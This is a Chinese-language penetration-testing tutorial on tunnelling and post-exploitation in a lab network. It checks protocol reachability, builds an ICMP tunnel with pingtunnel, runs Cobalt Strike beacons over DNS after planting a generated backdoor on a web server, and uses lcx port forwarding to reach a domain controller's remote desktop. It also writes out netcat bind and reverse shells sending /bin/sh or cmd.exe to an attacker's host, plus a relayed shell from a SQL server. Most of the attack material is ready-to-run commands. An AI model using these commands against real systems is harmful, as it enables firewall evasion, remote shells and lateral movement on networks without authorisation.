文章目录
- 代理和隧道技术区别
- 隧道通信原理
- 常用的隧道技术
- 判断内网协议连通性
- ICMP协议
- TCP协议
- telnet
- NC
- HTTP协议
- curl
- Wget
- DNS协议
- nslookup
- dig
- ICMP隧道
- pingtunnel
- 检测连通性
- DNS隧道
- 开放端口
- 域名修改解析记录
- 配置DNS监听器
- 生成后门
- 上线主机
- 传输层端口转发隧道
- Lcx
- NetCat
- 正向反弹 shell
- 反向反弹shell
- 多向连接反弹 shell-配合转发
- 相关 netcat 主要功能测试
- 总结
隧道技术为了解决?:
隧道技术前期必备条件
在用隧道之前要先探测对应隧道协议是否支持,如果不支持,用这个隧道也没有任何意义
隧道有各种层面的,每个层面又分不同协议,你想要用哪个隧道,就需要先确定目标主机是否支持对应隧道协议。
可以使用以下协议进行判断
用“ping”命令,执行 ping <域名/IP 地址>
ping www.baidu.com
ping 14.215.177.38
在Windows和Linux都可以用
执行telnet <域名/IP 地址> <端口>
telnet www.baidu.com 80
telnet 14.215.177.38 80
出现下图的黑色界面说明连接成功,端口可以正常访问
访问失败,说明端口是没有开启的或者被占用;
用“瑞士军刀”——netcat
执行 nc端口扫描命令:
nc -zv
nc -zv www.baidu.com 80
nc -zv 14.215.177.38 80
windows/linux
用“curl”工具,执行 curl <网址/IP> <端口> 命令。如果远程主机开启了相应的端口,且内网可连接外网的
话,就会输出相应的端口信息
curl www.baidu.com 80
curl 14.215.177.38 80
linux
执行 wget
wget -S www.baidu.com
wget -S 14.215.177.38
检测 DNS 连通性常用的命令是“nslookup”和“dig”
nslookup 是 windows 自带的 DNS 探测命令
nslookup www.baidu.com
nslookup 14.215.177.38
dig 是 linux 系统自带的 DNS 探测命令
dig www.baidu.com
dig 14.215.177.38
常用的ICMP隧道工具有icmpsh、PingTunel、icmptunel、powershell icmp等
网上介绍的大部分都是老牌工具ptunnel,ptunnel工具几年前就没有更新了,不推荐使用。
推荐pingtunnel,这个是一直在升级更新的一个工具。
老版本介绍:https://github.com/f1vefour/ptunnel(需自行编译)
新版本介绍:https://github.com/esrrhs/pingtunnel(二次开发版)
pingtunnel是把tcp/udp/sock5流量伪装成icmp流量进行转发的工具
为什么要转换?因为tcp、udp、sock5这几个协议受到防火墙和工具的拦截,这个工具就是把这些流量伪装成icmp进行数据传输!
语法
-p ##表示连接icmp隧道另一端的机器IP(即目标服务器)
-lp ##表示需要监听的本地tcp端口
-da ##指定需要转发的机器的IP(即目标内网某一机器的内网IP)
-dp ##指定需要转发的机器的端口(即目标内网某一机器的内网端口)
-x ##设置连接的密码
执行命令
命令
target2:./ptunnel -x xiaodi
kali:./ptunnel -p 192.168.80.145 -lp 1080 -da 192.168.33.33 -dp 3389 -x xiaodi
#转发的3389请求数据给本地1080
kali:rdesktop 127.0.0.1 1080
ping -c 4 192.168.33.33 #-c 4 发生数据包数量
开启隧道
在kali上执行以下命令
./ptunnel -p 192.168.80.145 -lp 1080 -da 192.168.33.33 -dp 3389 -x xiaodi
在kali上执行以下命令,弹出远程桌面
原本之前的3389连接远程桌面,使用的是3389对应的协议,现在连接远程桌面,流量数据传输就变成使用 ICMP 协议了。
常见协议监听器被拦截时,可以换其他协议上线,其中dns协议上线基本通杀
tips:需自行购买域名
云主机Teamserver配置端口53启用-udp
选择DNS协议
attacks–>packages–>windows executable(s)–>listener选择dns上线,勾选–>选择后门生成位置–>生成后门
将后门上传到webserver,执行。执行后门后,cs出现一个黑窗口。
点击小图标,出现unknown主机,原因是我们使用DNS上线,DNS速度特别慢。此时我们需要再敲几条命令才能实现控制。
右击unknown主机,选择interact,启用命令
checkin
mode dns-txt
shell whoami
尝试了screeshot截屏是可以的!
Tips:隧道技术其实就是通过变换协议,走不同协议来实现数据通信
隧道技术:传输层端口转发
工具:
windows: lcx
linux:portmap
lcx是一个端口转发工具,通过端口转发的形式,将内网服务器的某一个端口映射到公网另一台服务器的一个端口上去!
使用条件:
下载:https://github.com/MrAnonymous-1/lcx
在DC上执行以下命令,将本地3389给webserver的6666
Lcx.exe -slave 192.168.3.31 6666 127.0.0.1 3389 //将本地3389给webserver的6666
在webserver上执行以下命令,监听6666端口流量并转发至7777
Lcx.exe -listen 6666 7777 // 监听6666端口流量转发至7777端口
在kali上执行以下命令,连接webserver的7777,登录远程桌面访问,这里其实登录的是域控DC的远程桌面。
rdesktop 192.168.80.146:7777
DC 把本地的3389 转播到 webserver的6666端口 ,而webserver又把6666转到自己的7777 端口。
那么当kali去rdesktop访问webserver的7777端口时,就是连接的DC的远程桌面。
实验环境
正向:攻击者连接受害者
受害主机执行:
nc -ldp 1234 -e /bin/sh
#linux
nc -ldp 1234 -e c:\windows\system32\cmd.exe
#windows
攻击主机执行:
nc 192.168.76.132 1234
#主动连接
反向:受害者主机连接攻击者主机
攻击者执行:nc -lvp 1234
nc -lvp 1234
# 监听本地1234 等待受害主动把shell交过来
受害者主机:主动把shell反弹到对方ip端口上
nc 192.168.3.32 1234 -e /bin/sh
#linux
nc 192.168.3.32 1234 -e c:\windows\system32\cmd.exe
#windows
此时攻击机上收到shell会话
god\Webserver:
Lcx.exe -listen 2222 3333
god\Sqlserver:
nc 192.168.3.31 2222 -e c:\windows\system32\cmd.exe
kali :
nc -v 192.168.80.146 3333
和之前一样,sqlserver把自己的shell反弹给webserver的2222端口。webserver再把2222转到3333端口
由于kali能够和webserver联通,可以直接接收3333的shell,间接的取得了sqlserver的权限
指纹服务:nc -nv 192.168.76.143
端口扫描:nc -v -z 192.168.76.143 1-100
端口监听:nc -lvp xxxx
文件传输:nc -lp 1111 >1.txt|nc -vn xx.xx.x.x 1111 <1.txt -q 1
反弹 Shell:见上
隧道技术其实就是通过变换协议,走不同协议来实现数据通信!